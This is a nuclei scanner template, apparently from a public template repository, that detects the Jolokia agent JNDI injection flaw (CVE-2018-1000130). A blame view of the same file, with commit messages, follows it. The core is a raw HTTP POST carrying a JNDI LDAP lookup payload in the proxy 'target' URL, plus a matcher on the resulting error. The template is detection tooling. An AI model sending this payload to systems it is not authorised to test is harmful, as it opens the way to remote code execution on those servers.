nuclei-templates/cves/2018/CVE-2018-1000130.yaml

id: CVE-2018-1000130

info:
  name: Jolokia Agent Proxy JNDI Code Injection
  author: milo2012
  severity: high
  description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
  tags: cve,cve2018,jolokia,rce

requests:
  - raw:
      - |
        POST /jolokia/read/getDiagnosticOptions HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
        Accept-Language: en-GB,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 167

        {
            "type" : "read",
            "mbean" : "java.lang:type=Memory",
            "target" : {
                 "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
            }
        }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
        part: body
      - type: status
        status:
          - 200
Add CVE-2018-1000130.yaml - Jolokia Agent Proxy JNDI Code Injection 2021-06-22 12:32:30 +00:00			`id: CVE-2018-1000130`

			`info:`
			`name: Jolokia Agent Proxy JNDI Code Injection`
			`author: milo2012`
			`severity: high`
			`description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.`
			`tags: cve,cve2018,jolokia,rce`

			`requests:`
			`- raw:`
			`- \|`
			`POST /jolokia/read/getDiagnosticOptions HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.`
			`Accept-Language: en-GB,en;q=0.5`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`
			`Upgrade-Insecure-Requests: 1`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 167`

			`{`
			`"type" : "read",`
			`"mbean" : "java.lang:type=Memory",`
Add CVE-2018-1000130.yaml - fix spaces 2021-06-22 12:35:17 +00:00			`"target" : {`
Add CVE-2018-1000130.yaml - Jolokia Agent Proxy JNDI Code Injection 2021-06-22 12:32:30 +00:00			`"url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"`
Add CVE-2018-1000130.yaml - fix spaces 2021-06-22 12:35:17 +00:00			`}`
Add CVE-2018-1000130.yaml - Jolokia Agent Proxy JNDI Code Injection 2021-06-22 12:32:30 +00:00			`}`

fix or operator 2021-06-22 16:33:06 +00:00			`matchers-condition: and`
Add CVE-2018-1000130.yaml - Jolokia Agent Proxy JNDI Code Injection 2021-06-22 12:32:30 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"`
			`part: body`
			`- type: status`
			`status:`
fix or operator 2021-06-22 16:33:06 +00:00			`- 200`